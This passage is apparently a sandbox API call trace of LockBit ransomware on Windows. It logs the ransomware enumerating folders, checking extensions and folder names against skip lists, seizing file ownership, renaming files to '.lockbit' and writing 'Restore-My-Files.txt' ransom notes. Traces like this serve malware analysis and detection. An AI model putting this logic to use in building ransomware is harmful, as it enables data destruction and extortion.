[0086.692] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned=".xml" [0086.692] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0086.692] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0086.692] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0086.693] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0086.693] wsprintfW (in: param_1=0x344be80, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit") returned 97 [0086.693] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0086.693] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit")) returned 0 [0086.760] GetLastError () returned 0x5 [0086.760] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0086.760] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0086.761] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0086.762] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0086.762] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0086.762] NtOpenFile (in: FileHandle=0x344be28, DesiredAccess=0x80, ObjectAttributes=0x344bcd8*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344bcd0, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344be28*=0x3c4, IoStatusBlock=0x344bcd0*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0086.763] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0086.763] NtQueryInformationFile (in: FileHandle=0x3c4, IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344bcf0, FileInformation=0x344bbb0) returned 0x0 [0086.819] NtClose (Handle=0x3c4) returned 0x0 [0086.819] RtlFreeAnsiString (AnsiString="\\") [0086.819] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344be64 | out: TokenHandle=0x344be64*=0x3c4) returned 1 [0086.819] malloc (_Size=0x200) returned 0x53fcc0 [0086.819] GetTokenInformation (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344be60 | out: TokenInformation=0x53fcc0, ReturnLength=0x344be60) returned 1 [0086.819] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344be48, dwRevision=0x1 | out: pSecurityDescriptor=0x344be48) returned 1 [0086.819] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344be48, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344be48) returned 1 [0086.819] CloseHandle (hObject=0x3c4) returned 1 [0086.819] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344be48) returned 1 [0086.820] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344be48) returned 1 [0086.820] free (_Block=0x53fcc0) [0086.820] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0086.820] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit")) returned 1 [0086.837] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0086.837] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0086.837] malloc (_Size=0x40068) returned 0x206b860 [0086.837] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=924) returned 1 [0086.837] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0087.414] GetLastError () returned 0x3e5 [0087.414] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred") returned 1 [0087.414] wsprintfW (in: param_1=0x344bc38, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\Restore-My-Files.txt") returned 94 [0087.414] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0087.563] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0087.563] malloc (_Size=0x40068) returned 0x20abae0 [0087.563] WriteFile (in: hFile=0x3b0, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0087.566] GetLastError () returned 0x3e5 [0087.566] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe263df, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe263df, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe263df, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x39c, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="oskpredbase.xml", cAlternateFileName="")) returned 0 [0087.566] GetLastError () returned 0x12 [0087.566] FindClose (in: hFindFile=0x2e32d0 | out: hFindFile=0x2e32d0) returned 1 [0087.566] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8fe00281, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8fe00281, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8fe00281, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd7, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="oskpred.xml", cAlternateFileName="")) returned 1 [0087.566] lstrcmpiW (lpString1=".", lpString2="oskpred.xml") returned -1 [0087.566] lstrcmpiW (lpString1="..", lpString2="oskpred.xml") returned -1 [0087.566] PathFindExtensionW (pszPath="oskpred.xml") returned=".xml" [0087.566] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0087.566] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0087.567] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0087.568] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0087.568] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="oskpred.xml") returned 1 [0087.568] lstrcmpiW (lpString1="ntldr", lpString2="oskpred.xml") returned -1 [0087.568] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="oskpred.xml") returned -1 [0087.568] lstrcmpiW (lpString1="bootsect.bak", lpString2="oskpred.xml") returned -1 [0087.568] lstrcmpiW (lpString1="autorun.inf", lpString2="oskpred.xml") returned -1 [0087.568] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\") returned="" [0087.568] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned=".xml" [0087.568] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0087.568] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0087.568] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0087.569] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0087.569] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.lockbit") returned 85 [0087.569] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0087.569] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.lockbit")) returned 0 [0087.570] GetLastError () returned 0x5 [0087.570] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0087.570] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0087.570] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.571] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0087.571] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0087.571] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3c0, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0087.571] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0087.571] NtQueryInformationFile (in: FileHandle=0x3c0, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0087.588] NtClose (Handle=0x3c0) returned 0x0 [0087.588] RtlFreeAnsiString (AnsiString="\\") [0087.589] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3c0) returned 1 [0087.589] malloc (_Size=0x200) returned 0x53fcc0 [0087.589] GetTokenInformation (in: TokenHandle=0x3c0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0087.589] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0087.589] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0087.589] CloseHandle (hObject=0x3c0) returned 1 [0087.589] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0087.589] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0087.590] free (_Block=0x53fcc0) [0087.590] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0087.590] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.lockbit")) returned 1 [0087.591] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c0 [0087.591] CreateIoCompletionPort (FileHandle=0x3c0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0087.591] malloc (_Size=0x40068) returned 0x20abae0 [0087.591] GetFileSizeEx (in: hFile=0x3c0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=215) returned 1 [0087.591] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 0x0 [0087.606] GetLastError () returned 0x3e5 [0087.606] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions") returned 1 [0087.606] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt") returned 86 [0087.606] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.606] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="symbols", cAlternateFileName="")) returned 1 [0087.606] lstrcmpiW (lpString1=".", lpString2="symbols") returned -1 [0087.606] lstrcmpiW (lpString1="..", lpString2="symbols") returned -1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="$windows.~bt") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="intel") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="msocache") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="$recycle.bin") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="$windows.~ws") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="tor browser") returned -1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="boot") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="system volume information") returned -1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="perflogs") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="google") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="application data") returned 1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="windows") returned -1 [0087.606] lstrcmpiW (lpString1="symbols", lpString2="windows.old") returned -1 [0087.607] lstrcmpiW (lpString1="symbols", lpString2="appdata") returned 1 [0087.607] lstrcmpiW (lpString1="symbols", lpString2="Windows nt") returned -1 [0087.607] lstrcmpiW (lpString1="symbols", lpString2="Msbuild") returned 1 [0087.607] lstrcmpiW (lpString1="symbols", lpString2="Microsoft") returned 1 [0087.607] lstrcmpiW (lpString1="symbols", lpString2="All users") returned 1 [0087.607] lstrcmpiW (lpString1="symbols", lpString2="mozilla") returned 1 [0087.607] wsprintfW (in: param_1=0x344ca60, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols") returned 73 [0087.607] wsprintfW (in: param_1=0x344c2c0, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*") returned 75 [0087.607] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\*"), fInfoLevelId=0x0, lpFindFileData=0x344c7a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344c7a8) returned 0x2e32d0 [0087.607] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0087.607] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7c69c0, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7ecb1a, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7ecb1a, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="..", cAlternateFileName="")) returned 1 [0087.607] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0087.608] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0087.608] FindNextFileW (in: hFindFile=0x2e32d0, lpFindFileData=0x344c7a8 | out: lpFindFileData=0x344c7a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1dc0758, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1dc0758, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x900155a5, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0xfd7a0866, dwReserved1=0x1ca0431, cFileName="ea-sym.xml", cAlternateFileName="")) returned 1 [0087.608] lstrcmpiW (lpString1=".", lpString2="ea-sym.xml") returned -1 [0087.608] lstrcmpiW (lpString1="..", lpString2="ea-sym.xml") returned -1 [0087.608] PathFindExtensionW (pszPath="ea-sym.xml") returned=".xml" [0087.608] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0087.608] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0087.608] 